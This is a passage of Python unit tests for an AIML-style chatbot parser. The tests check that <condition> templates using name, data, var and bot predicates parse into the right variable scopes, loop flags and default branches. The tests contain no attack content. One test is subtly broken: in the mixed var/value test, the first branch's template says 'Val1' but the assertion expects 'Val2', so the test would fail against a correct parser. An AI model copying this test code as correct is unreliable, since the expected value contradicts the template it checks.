    self.assertEqual(len(condition.children), 4)
    # (resolved text, has <loop/>, is the default <li>)
    expectations = [("A", False, False),
                    ("B", False, False),
                    ("C", True, False),
                    ("D", False, True)]
    for index, (word, loops, default) in enumerate(expectations):
        item = condition.children[index]
        self.assertIsInstance(item, TemplateConditionListItemNode)
        self.assertEqual(item.var_type, TemplateConditionVariable.LOCAL)
        if loops:
            self.assertTrue(item.loop)
        else:
            self.assertFalse(item.loop)
        self.assertIsNone(item.name)
        if default:
            self.assertIsNone(item.value)
            self.assertTrue(item.is_default())
        else:
            self.assertIsInstance(item.value, TemplateNode)
            self.assertFalse(item.is_default())
        self.assertEqual(len(item.children), 1)
        self.assertEqual(item.children[0].resolve(self._client_context), word)
def test_condition_template_single_typename_name_attr_value_attrs(self):
    """Condition with the predicate name given as a name="..." attribute
    (GLOBAL scope); list items carry their own values and the bare <li>
    is the default branch."""
    template = ET.fromstring("""
<template>
<condition name="aname">
<li value="a">A</li>
<li value="b">B</li>
<li><value>c</value>C</li>
<li>D</li>
</condition>
</template>
""")
    ast = self._graph.parse_template_expression(template)
    self.assertIsNotNone(ast)
    self.assertIsInstance(ast, TemplateNode)
    self.assertIsNotNone(ast.children)
    condition = ast.children[0]
    self.assertIsNotNone(condition)
    self.assertIsInstance(condition, TemplateConditionNode)
    self.assertEqual(condition.var_type, TemplateConditionVariable.GLOBAL)
    self.assertEqual(condition.name.children[0].word, "aname")
    self.assertEqual(len(condition.children), 4)
    # (resolved text, has <loop/>, is the default <li>)
    expectations = [("A", False, False),
                    ("B", False, False),
                    ("C", False, False),
                    ("D", False, True)]
    for index, (word, loops, default) in enumerate(expectations):
        item = condition.children[index]
        self.assertIsInstance(item, TemplateConditionListItemNode)
        self.assertEqual(item.var_type, TemplateConditionVariable.GLOBAL)
        if loops:
            self.assertTrue(item.loop)
        else:
            self.assertFalse(item.loop)
        self.assertIsNone(item.name)
        if default:
            self.assertIsNone(item.value)
            self.assertTrue(item.is_default())
        else:
            self.assertIsInstance(item.value, TemplateNode)
            self.assertFalse(item.is_default())
        self.assertEqual(len(item.children), 1)
        self.assertEqual(item.children[0].resolve(self._client_context), word)
def test_condition_template_single_typedata_name_attr_value_attrs(self):
    """Condition with the predicate name given as a data="..." attribute
    (DATA scope); list items carry their own values and the bare <li>
    is the default branch."""
    template = ET.fromstring("""
<template>
<condition data="aname">
<li value="a">A</li>
<li value="b">B</li>
<li><value>c</value>C</li>
<li>D</li>
</condition>
</template>
""")
    ast = self._graph.parse_template_expression(template)
    self.assertIsNotNone(ast)
    self.assertIsInstance(ast, TemplateNode)
    self.assertIsNotNone(ast.children)
    condition = ast.children[0]
    self.assertIsNotNone(condition)
    self.assertIsInstance(condition, TemplateConditionNode)
    self.assertEqual(condition.var_type, TemplateConditionVariable.DATA)
    self.assertEqual(condition.name.children[0].word, "aname")
    self.assertEqual(len(condition.children), 4)
    # (resolved text, has <loop/>, is the default <li>)
    expectations = [("A", False, False),
                    ("B", False, False),
                    ("C", False, False),
                    ("D", False, True)]
    for index, (word, loops, default) in enumerate(expectations):
        item = condition.children[index]
        self.assertIsInstance(item, TemplateConditionListItemNode)
        self.assertEqual(item.var_type, TemplateConditionVariable.DATA)
        if loops:
            self.assertTrue(item.loop)
        else:
            self.assertFalse(item.loop)
        self.assertIsNone(item.name)
        if default:
            self.assertIsNone(item.value)
            self.assertTrue(item.is_default())
        else:
            self.assertIsInstance(item.value, TemplateNode)
            self.assertFalse(item.is_default())
        self.assertEqual(len(item.children), 1)
        self.assertEqual(item.children[0].resolve(self._client_context), word)
def test_condition_template_single_typevar_name_attr_value_attrs(self):
    """Condition with the predicate name given as a var="..." attribute
    (LOCAL scope); list items carry their own values and the bare <li>
    is the default branch."""
    template = ET.fromstring("""
<template>
<condition var="aname">
<li value="a">A</li>
<li value="b">B</li>
<li><value>c</value>C</li>
<li>D</li>
</condition>
</template>
""")
    ast = self._graph.parse_template_expression(template)
    self.assertIsNotNone(ast)
    self.assertIsInstance(ast, TemplateNode)
    self.assertIsNotNone(ast.children)
    condition = ast.children[0]
    self.assertIsNotNone(condition)
    self.assertIsInstance(condition, TemplateConditionNode)
    self.assertEqual(condition.var_type, TemplateConditionVariable.LOCAL)
    self.assertEqual(condition.name.children[0].word, "aname")
    self.assertEqual(len(condition.children), 4)
    # (resolved text, has <loop/>, is the default <li>)
    expectations = [("A", False, False),
                    ("B", False, False),
                    ("C", False, False),
                    ("D", False, True)]
    for index, (word, loops, default) in enumerate(expectations):
        item = condition.children[index]
        self.assertIsInstance(item, TemplateConditionListItemNode)
        self.assertEqual(item.var_type, TemplateConditionVariable.LOCAL)
        if loops:
            self.assertTrue(item.loop)
        else:
            self.assertFalse(item.loop)
        self.assertIsNone(item.name)
        if default:
            self.assertIsNone(item.value)
            self.assertTrue(item.is_default())
        else:
            self.assertIsInstance(item.value, TemplateNode)
            self.assertFalse(item.is_default())
        self.assertEqual(len(item.children), 1)
        self.assertEqual(item.children[0].resolve(self._client_context), word)
def test_condition_template_single_bot_name_attr_value_attrs(self):
    """Condition with the predicate name given as a bot="..." attribute
    (BOT scope); list items carry their own values and the bare <li>
    is the default branch."""
    template = ET.fromstring("""
<template>
<condition bot="aname">
<li value="a">A</li>
<li value="b">B</li>
<li><value>c</value>C</li>
<li>D</li>
</condition>
</template>
""")
    ast = self._graph.parse_template_expression(template)
    self.assertIsNotNone(ast)
    self.assertIsInstance(ast, TemplateNode)
    self.assertIsNotNone(ast.children)
    condition = ast.children[0]
    self.assertIsNotNone(condition)
    self.assertIsInstance(condition, TemplateConditionNode)
    self.assertEqual(condition.var_type, TemplateConditionVariable.BOT)
    self.assertEqual(condition.name.children[0].word, "aname")
    self.assertEqual(len(condition.children), 4)
    # (resolved text, has <loop/>, is the default <li>)
    expectations = [("A", False, False),
                    ("B", False, False),
                    ("C", False, False),
                    ("D", False, True)]
    for index, (word, loops, default) in enumerate(expectations):
        item = condition.children[index]
        self.assertIsInstance(item, TemplateConditionListItemNode)
        self.assertEqual(item.var_type, TemplateConditionVariable.BOT)
        if loops:
            self.assertTrue(item.loop)
        else:
            self.assertFalse(item.loop)
        self.assertIsNone(item.name)
        if default:
            self.assertIsNone(item.value)
            self.assertTrue(item.is_default())
        else:
            self.assertIsInstance(item.value, TemplateNode)
            self.assertFalse(item.is_default())
        self.assertEqual(len(item.children), 1)
        self.assertEqual(item.children[0].resolve(self._client_context), word)
def test_condition_template_Single_invalid_tag(self):
    """An unknown child tag (<lx>) inside a condition must be rejected
    by the parser."""
    template = ET.fromstring("""
<template>
<condition bot="aname">
<li value="a">A</li>
<li value="b">B</li>
<li><value>c</value>C</li>
<lx>D</lx>
</condition>
</template>
""")
    self.assertRaises(Exception, self._graph.parse_template_expression, template)
def test_condition_template_Single_invalid_type(self):
    """A single-type condition must reject an <li> that names a different
    predicate (name attribute on the third item)."""
    template = ET.fromstring("""
<template>
<condition bot="aname">
<li value="a">A</li>
<li value="b">B</li>
<li name="name1"><value>c</value>C</li>
<li>D</li>
</condition>
</template>
""")
    self.assertRaises(Exception, self._graph.parse_template_expression, template)
##################################################################################################################
# Multiple (type3)
#
def test_condition_template_multi_typename_name_value_mixed(self):
    """Multi-style (type 3) condition: every <li> names both the predicate
    and the value, mixing attribute and child-element forms; the bare <li>
    is the DEFAULT branch.

    Fix: the fourth list item was missing the assertIsNotNone(name) check
    that its siblings had — all named items are now verified uniformly.
    """
    template = ET.fromstring("""
<template>
<condition>
<li name='name1' value="a">Val1</li>
<li value="b"><name>name2</name>Val2</li>
<li name="name3"><value>c</value>Val3</li>
<li><name>name4</name><value>d</value>Val4</li>
<li>Val5</li>
</condition>
</template>
""")
    ast = self._graph.parse_template_expression(template)
    self.assertIsNotNone(ast)
    self.assertIsInstance(ast, TemplateNode)
    self.assertIsNotNone(ast.children)
    condition = ast.children[0]
    self.assertIsNotNone(condition)
    self.assertIsInstance(condition, TemplateConditionNode)
    self.assertEqual(len(condition.children), 5)
    # (predicate name, resolved text, has <loop/>)
    expectations = [("name1", "Val1", False),
                    ("name2", "Val2", False),
                    ("name3", "Val3", False),
                    ("name4", "Val4", False)]
    for index, (name_word, value_word, loops) in enumerate(expectations):
        item = condition.children[index]
        self.assertIsInstance(item, TemplateConditionListItemNode)
        self.assertEqual(item.var_type, TemplateConditionVariable.GLOBAL)
        if loops:
            self.assertTrue(item.loop)
        else:
            self.assertFalse(item.loop)
        self.assertIsNotNone(item.name)
        self.assertEqual(item.name.children[0].word, name_word)
        self.assertIsNotNone(item.value)
        self.assertIsInstance(item.value, TemplateNode)
        self.assertFalse(item.is_default())
        self.assertEqual(len(item.children), 1)
        self.assertEqual(item.children[0].resolve(self._client_context), value_word)
    # Last <li> has neither name nor value: the default branch.
    default_item = condition.children[4]
    self.assertIsInstance(default_item, TemplateConditionListItemNode)
    self.assertEqual(default_item.var_type, TemplateConditionVariable.DEFAULT)
    self.assertFalse(default_item.loop)
    self.assertIsNone(default_item.name)
    self.assertIsNone(default_item.value)
    self.assertTrue(default_item.is_default())
    self.assertEqual(len(default_item.children), 1)
    self.assertEqual(default_item.children[0].resolve(self._client_context), "Val5")
def test_condition_template_multi_typename_name_value_mixed_loop(self):
    """Multi-style (type 3) condition with a <loop/> on the first <li>;
    only that item's loop flag must be set.

    Fix: the fourth list item was missing the assertIsNotNone(name) check
    that its siblings had — all named items are now verified uniformly.
    """
    template = ET.fromstring("""
<template>
<condition>
<li name='name1' value="a">Val1 <loop /></li>
<li value="b"><name>name2</name>Val2</li>
<li name="name3"><value>c</value>Val3</li>
<li><name>name4</name><value>d</value>Val4</li>
<li>Val5</li>
</condition>
</template>
""")
    ast = self._graph.parse_template_expression(template)
    self.assertIsNotNone(ast)
    self.assertIsInstance(ast, TemplateNode)
    self.assertIsNotNone(ast.children)
    condition = ast.children[0]
    self.assertIsNotNone(condition)
    self.assertIsInstance(condition, TemplateConditionNode)
    self.assertEqual(len(condition.children), 5)
    # (predicate name, resolved text, has <loop/>)
    expectations = [("name1", "Val1", True),
                    ("name2", "Val2", False),
                    ("name3", "Val3", False),
                    ("name4", "Val4", False)]
    for index, (name_word, value_word, loops) in enumerate(expectations):
        item = condition.children[index]
        self.assertIsInstance(item, TemplateConditionListItemNode)
        self.assertEqual(item.var_type, TemplateConditionVariable.GLOBAL)
        if loops:
            self.assertTrue(item.loop)
        else:
            self.assertFalse(item.loop)
        self.assertIsNotNone(item.name)
        self.assertEqual(item.name.children[0].word, name_word)
        self.assertIsNotNone(item.value)
        self.assertIsInstance(item.value, TemplateNode)
        self.assertFalse(item.is_default())
        self.assertEqual(len(item.children), 1)
        self.assertEqual(item.children[0].resolve(self._client_context), value_word)
    # Last <li> has neither name nor value: the default branch.
    default_item = condition.children[4]
    self.assertIsInstance(default_item, TemplateConditionListItemNode)
    self.assertEqual(default_item.var_type, TemplateConditionVariable.DEFAULT)
    self.assertFalse(default_item.loop)
    self.assertIsNone(default_item.name)
    self.assertIsNone(default_item.value)
    self.assertTrue(default_item.is_default())
    self.assertEqual(len(default_item.children), 1)
    self.assertEqual(default_item.children[0].resolve(self._client_context), "Val5")
def test_condition_template_multi_typedata_name_value_mixed(self):
    """Multi-style (type 3) condition with DATA-scope predicates: every
    <li> names both the predicate (data attribute or <data> child) and
    the value; the bare <li> is the DEFAULT branch.

    Fix: the fourth list item was missing the assertIsNotNone(name) check
    that its siblings had — all named items are now verified uniformly.
    """
    template = ET.fromstring("""
<template>
<condition>
<li data='name1' value="a">Val1</li>
<li value="b"><data>name2</data>Val2</li>
<li data="name3"><value>c</value>Val3</li>
<li><data>name4</data><value>d</value>Val4</li>
<li>Val5</li>
</condition>
</template>
""")
    ast = self._graph.parse_template_expression(template)
    self.assertIsNotNone(ast)
    self.assertIsInstance(ast, TemplateNode)
    self.assertIsNotNone(ast.children)
    condition = ast.children[0]
    self.assertIsNotNone(condition)
    self.assertIsInstance(condition, TemplateConditionNode)
    self.assertEqual(len(condition.children), 5)
    # (predicate name, resolved text, has <loop/>)
    expectations = [("name1", "Val1", False),
                    ("name2", "Val2", False),
                    ("name3", "Val3", False),
                    ("name4", "Val4", False)]
    for index, (name_word, value_word, loops) in enumerate(expectations):
        item = condition.children[index]
        self.assertIsInstance(item, TemplateConditionListItemNode)
        self.assertEqual(item.var_type, TemplateConditionVariable.DATA)
        if loops:
            self.assertTrue(item.loop)
        else:
            self.assertFalse(item.loop)
        self.assertIsNotNone(item.name)
        self.assertEqual(item.name.children[0].word, name_word)
        self.assertIsNotNone(item.value)
        self.assertIsInstance(item.value, TemplateNode)
        self.assertFalse(item.is_default())
        self.assertEqual(len(item.children), 1)
        self.assertEqual(item.children[0].resolve(self._client_context), value_word)
    # Last <li> has neither name nor value: the default branch.
    default_item = condition.children[4]
    self.assertIsInstance(default_item, TemplateConditionListItemNode)
    self.assertEqual(default_item.var_type, TemplateConditionVariable.DEFAULT)
    self.assertFalse(default_item.loop)
    self.assertIsNone(default_item.name)
    self.assertIsNone(default_item.value)
    self.assertTrue(default_item.is_default())
    self.assertEqual(len(default_item.children), 1)
    self.assertEqual(default_item.children[0].resolve(self._client_context), "Val5")
def test_condition_template_multi_typedata_name_value_mixed_loop(self):
    """Multi-style (type 3) DATA-scope condition with a <loop/> on the
    first <li>; only that item's loop flag must be set.

    Fix: the fourth list item was missing the assertIsNotNone(name) check
    that its siblings had — all named items are now verified uniformly.
    """
    template = ET.fromstring("""
<template>
<condition>
<li data='name1' value="a">Val1 <loop /></li>
<li value="b"><data>name2</data>Val2</li>
<li data="name3"><value>c</value>Val3</li>
<li><data>name4</data><value>d</value>Val4</li>
<li>Val5</li>
</condition>
</template>
""")
    ast = self._graph.parse_template_expression(template)
    self.assertIsNotNone(ast)
    self.assertIsInstance(ast, TemplateNode)
    self.assertIsNotNone(ast.children)
    condition = ast.children[0]
    self.assertIsNotNone(condition)
    self.assertIsInstance(condition, TemplateConditionNode)
    self.assertEqual(len(condition.children), 5)
    # (predicate name, resolved text, has <loop/>)
    expectations = [("name1", "Val1", True),
                    ("name2", "Val2", False),
                    ("name3", "Val3", False),
                    ("name4", "Val4", False)]
    for index, (name_word, value_word, loops) in enumerate(expectations):
        item = condition.children[index]
        self.assertIsInstance(item, TemplateConditionListItemNode)
        self.assertEqual(item.var_type, TemplateConditionVariable.DATA)
        if loops:
            self.assertTrue(item.loop)
        else:
            self.assertFalse(item.loop)
        self.assertIsNotNone(item.name)
        self.assertEqual(item.name.children[0].word, name_word)
        self.assertIsNotNone(item.value)
        self.assertIsInstance(item.value, TemplateNode)
        self.assertFalse(item.is_default())
        self.assertEqual(len(item.children), 1)
        self.assertEqual(item.children[0].resolve(self._client_context), value_word)
    # Last <li> has neither name nor value: the default branch.
    default_item = condition.children[4]
    self.assertIsInstance(default_item, TemplateConditionListItemNode)
    self.assertEqual(default_item.var_type, TemplateConditionVariable.DEFAULT)
    self.assertFalse(default_item.loop)
    self.assertIsNone(default_item.name)
    self.assertIsNone(default_item.value)
    self.assertTrue(default_item.is_default())
    self.assertEqual(len(default_item.children), 1)
    self.assertEqual(default_item.children[0].resolve(self._client_context), "Val5")
def test_condition_template_multi_typevar_name_value_mixed(self):
    """Parse a multi-branch <condition> mixing var/value as attributes and
    as child elements.

    Every named branch must be typed LOCAL regardless of which form was
    used, and the bare <li> must become the default branch.
    """
    template = ET.fromstring("""
        <template>
            <condition>
                <li var='name1' value="a">Val1</li>
                <li value="b"><var>name2</var>Val2</li>
                <li var="name3"><value>c</value>Val3</li>
                <li><var>name4</var><value>d</value>Val4</li>
                <li>Val5</li>
            </condition>
        </template>
        """)
    ast = self._graph.parse_template_expression(template)
    self.assertIsNotNone(ast)
    self.assertIsInstance(ast, TemplateNode)
    self.assertIsNotNone(ast.children)
    template_node = ast.children[0]
    self.assertIsNotNone(template_node)
    self.assertIsInstance(template_node, TemplateConditionNode)
    self.assertEqual(len(template_node.children), 5)

    # Branch 0: var attribute + value attribute.
    node = template_node.children[0]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
    self.assertFalse(node.loop)
    self.assertIsNotNone(node.name)
    self.assertEqual(node.name.children[0].word, "name1")
    self.assertIsNotNone(node.value)
    self.assertIsInstance(node.value, TemplateNode)
    self.assertFalse(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val2")

    # Branch 1: value attribute + <var> child element.
    node = template_node.children[1]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
    self.assertFalse(node.loop)
    self.assertIsNotNone(node.name)
    self.assertEqual(node.name.children[0].word, "name2")
    self.assertIsNotNone(node.value)
    self.assertIsInstance(node.value, TemplateNode)
    self.assertFalse(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val2")

    # Branch 2: var attribute + <value> child element.
    node = template_node.children[2]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
    self.assertFalse(node.loop)
    self.assertIsNotNone(node.name)
    self.assertEqual(node.name.children[0].word, "name3")
    self.assertIsNotNone(node.value)
    self.assertIsInstance(node.value, TemplateNode)
    self.assertFalse(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val3")

    # Branch 3: <var> child + <value> child.
    node = template_node.children[3]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
    self.assertFalse(node.loop)
    # Fixed: this guard was missing for this branch only (present on all
    # sibling branches); without it a None name fails with AttributeError
    # on the next line instead of a clear assertion message.
    self.assertIsNotNone(node.name)
    self.assertEqual(node.name.children[0].word, "name4")
    self.assertIsNotNone(node.value)
    self.assertIsInstance(node.value, TemplateNode)
    self.assertFalse(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val4")

    # Branch 4: bare <li> is the default branch (no name, no value).
    node = template_node.children[4]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.DEFAULT)
    self.assertFalse(node.loop)
    self.assertIsNone(node.name)
    self.assertIsNone(node.value)
    self.assertTrue(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val5")
def test_condition_template_multi_typevar_name_value_mixed_loop(self):
    """Same mixed var/value <condition> as the non-loop variant, but the
    first branch carries a <loop/>: only that branch reports loop=True."""
    template = ET.fromstring("""
        <template>
            <condition>
                <li var='name1' value="a">Val1 <loop /></li>
                <li value="b"><var>name2</var>Val2</li>
                <li var="name3"><value>c</value>Val3</li>
                <li><var>name4</var><value>d</value>Val4</li>
                <li>Val5</li>
            </condition>
        </template>
        """)
    ast = self._graph.parse_template_expression(template)
    self.assertIsNotNone(ast)
    self.assertIsInstance(ast, TemplateNode)
    self.assertIsNotNone(ast.children)
    template_node = ast.children[0]
    self.assertIsNotNone(template_node)
    self.assertIsInstance(template_node, TemplateConditionNode)
    self.assertEqual(len(template_node.children), 5)

    # Branch 0: carries the <loop/> marker.
    node = template_node.children[0]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
    self.assertTrue(node.loop)
    self.assertIsNotNone(node.name)
    self.assertEqual(node.name.children[0].word, "name1")
    self.assertIsNotNone(node.value)
    self.assertIsInstance(node.value, TemplateNode)
    self.assertFalse(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val1")

    node = template_node.children[1]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
    self.assertFalse(node.loop)
    self.assertIsNotNone(node.name)
    self.assertEqual(node.name.children[0].word, "name2")
    self.assertIsNotNone(node.value)
    self.assertIsInstance(node.value, TemplateNode)
    self.assertFalse(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val2")

    node = template_node.children[2]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
    self.assertFalse(node.loop)
    self.assertIsNotNone(node.name)
    self.assertEqual(node.name.children[0].word, "name3")
    self.assertIsNotNone(node.value)
    self.assertIsInstance(node.value, TemplateNode)
    self.assertFalse(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val3")

    node = template_node.children[3]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
    self.assertFalse(node.loop)
    # Fixed: guard was missing for this branch only; keeps failure mode an
    # assertion rather than an AttributeError when name is None.
    self.assertIsNotNone(node.name)
    self.assertEqual(node.name.children[0].word, "name4")
    self.assertIsNotNone(node.value)
    self.assertIsInstance(node.value, TemplateNode)
    self.assertFalse(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val4")

    # Default branch.
    node = template_node.children[4]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.DEFAULT)
    self.assertFalse(node.loop)
    self.assertIsNone(node.name)
    self.assertIsNone(node.value)
    self.assertTrue(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val5")
def test_condition_template_multi_bot_name_value_mixed(self):
    """Parse a multi-branch <condition> mixing bot/value as attributes and
    as child elements; every named branch must be typed BOT."""
    template = ET.fromstring("""
        <template>
            <condition>
                <li bot='name1' value="a">Val1</li>
                <li value="b"><bot>name2</bot>Val2</li>
                <li bot="name3"><value>c</value>Val3</li>
                <li><bot>name4</bot><value>d</value>Val4</li>
                <li>Val5</li>
            </condition>
        </template>
        """)
    ast = self._graph.parse_template_expression(template)
    self.assertIsNotNone(ast)
    self.assertIsInstance(ast, TemplateNode)
    self.assertIsNotNone(ast.children)
    template_node = ast.children[0]
    self.assertIsNotNone(template_node)
    self.assertIsInstance(template_node, TemplateConditionNode)
    self.assertEqual(len(template_node.children), 5)

    node = template_node.children[0]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
    self.assertFalse(node.loop)
    self.assertIsNotNone(node.name)
    self.assertEqual(node.name.children[0].word, "name1")
    self.assertIsNotNone(node.value)
    self.assertIsInstance(node.value, TemplateNode)
    self.assertFalse(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val1")

    node = template_node.children[1]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
    self.assertFalse(node.loop)
    self.assertIsNotNone(node.name)
    self.assertEqual(node.name.children[0].word, "name2")
    self.assertIsNotNone(node.value)
    self.assertIsInstance(node.value, TemplateNode)
    self.assertFalse(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val2")

    node = template_node.children[2]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
    self.assertFalse(node.loop)
    self.assertIsNotNone(node.name)
    self.assertEqual(node.name.children[0].word, "name3")
    self.assertIsNotNone(node.value)
    self.assertIsInstance(node.value, TemplateNode)
    self.assertFalse(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val3")

    node = template_node.children[3]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
    self.assertFalse(node.loop)
    # Fixed: guard was missing for this branch only (present on siblings).
    self.assertIsNotNone(node.name)
    self.assertEqual(node.name.children[0].word, "name4")
    self.assertIsNotNone(node.value)
    self.assertIsInstance(node.value, TemplateNode)
    self.assertFalse(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val4")

    # Default branch.
    node = template_node.children[4]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.DEFAULT)
    self.assertFalse(node.loop)
    self.assertIsNone(node.name)
    self.assertIsNone(node.value)
    self.assertTrue(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val5")
def test_condition_template_multi_bot_name_value_mixed_loop(self):
    """Same mixed bot/value <condition> as the non-loop variant, but the
    first branch carries a <loop/>: only that branch reports loop=True."""
    template = ET.fromstring("""
        <template>
            <condition>
                <li bot='name1' value="a">Val1 <loop /></li>
                <li value="b"><bot>name2</bot>Val2</li>
                <li bot="name3"><value>c</value>Val3</li>
                <li><bot>name4</bot><value>d</value>Val4</li>
                <li>Val5</li>
            </condition>
        </template>
        """)
    ast = self._graph.parse_template_expression(template)
    self.assertIsNotNone(ast)
    self.assertIsInstance(ast, TemplateNode)
    self.assertIsNotNone(ast.children)
    template_node = ast.children[0]
    self.assertIsNotNone(template_node)
    self.assertIsInstance(template_node, TemplateConditionNode)
    self.assertEqual(len(template_node.children), 5)

    # Branch 0: carries the <loop/> marker.
    node = template_node.children[0]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
    self.assertTrue(node.loop)
    self.assertIsNotNone(node.name)
    self.assertEqual(node.name.children[0].word, "name1")
    self.assertIsNotNone(node.value)
    self.assertIsInstance(node.value, TemplateNode)
    self.assertFalse(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val1")

    node = template_node.children[1]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
    self.assertFalse(node.loop)
    self.assertIsNotNone(node.name)
    self.assertEqual(node.name.children[0].word, "name2")
    self.assertIsNotNone(node.value)
    self.assertIsInstance(node.value, TemplateNode)
    self.assertFalse(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val2")

    node = template_node.children[2]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
    self.assertFalse(node.loop)
    self.assertIsNotNone(node.name)
    self.assertEqual(node.name.children[0].word, "name3")
    self.assertIsNotNone(node.value)
    self.assertIsInstance(node.value, TemplateNode)
    self.assertFalse(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val3")

    node = template_node.children[3]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.BOT)
    self.assertFalse(node.loop)
    # Fixed: guard was missing for this branch only (present on siblings).
    self.assertIsNotNone(node.name)
    self.assertEqual(node.name.children[0].word, "name4")
    self.assertIsNotNone(node.value)
    self.assertIsInstance(node.value, TemplateNode)
    self.assertFalse(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val4")

    # Default branch.
    node = template_node.children[4]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.DEFAULT)
    self.assertFalse(node.loop)
    self.assertIsNone(node.name)
    self.assertIsNone(node.value)
    self.assertTrue(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val5")
def test_condition_template_multi_type(self):
    """A single <condition> whose branches each use a different variable
    type: name -> GLOBAL, data -> DATA, var -> LOCAL, bot -> BOT, and a
    bare <li> default. The first branch also carries a <loop/>."""
    template = ET.fromstring("""
        <template>
            <condition>
                <li name='name1' value="a">Val1 <loop /></li>
                <li value="b"><data>name2</data>Val2</li>
                <li var="name3"><value>c</value>Val3</li>
                <li><bot>name4</bot><value>d</value>Val4</li>
                <li>Val5</li>
            </condition>
        </template>
        """)
    ast = self._graph.parse_template_expression(template)
    self.assertIsNotNone(ast)
    self.assertIsInstance(ast, TemplateNode)
    self.assertIsNotNone(ast.children)
    template_node = ast.children[0]
    self.assertIsNotNone(template_node)
    self.assertIsInstance(template_node, TemplateConditionNode)
    self.assertEqual(len(template_node.children), 5)

    # Branch 0: 'name' attribute -> GLOBAL, with <loop/>.
    node = template_node.children[0]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.GLOBAL)
    self.assertTrue(node.loop)
    self.assertIsNotNone(node.name)
    self.assertEqual(node.name.children[0].word, "name1")
    self.assertIsNotNone(node.value)
    self.assertIsInstance(node.value, TemplateNode)
    self.assertFalse(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val1")

    # Branch 1: <data> child -> DATA.
    node = template_node.children[1]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.DATA)
    self.assertFalse(node.loop)
    self.assertIsNotNone(node.name)
    self.assertEqual(node.name.children[0].word, "name2")
    self.assertIsNotNone(node.value)
    self.assertIsInstance(node.value, TemplateNode)
    self.assertFalse(node.is_default())
    self.assertEqual(len(node.children), 1)
    self.assertEqual(node.children[0].resolve(self._client_context), "Val2")

    # Branch 2: 'var' attribute -> LOCAL.
    node = template_node.children[2]
    self.assertIsInstance(node, TemplateConditionListItemNode)
    self.assertEqual(node.var_type, TemplateConditionVariable.LOCAL)
    self.assertFalse(node.loop)
    self.assertIsNotNone(node.name)
    self.assertEqual(node.name.children[0].word, "name3")
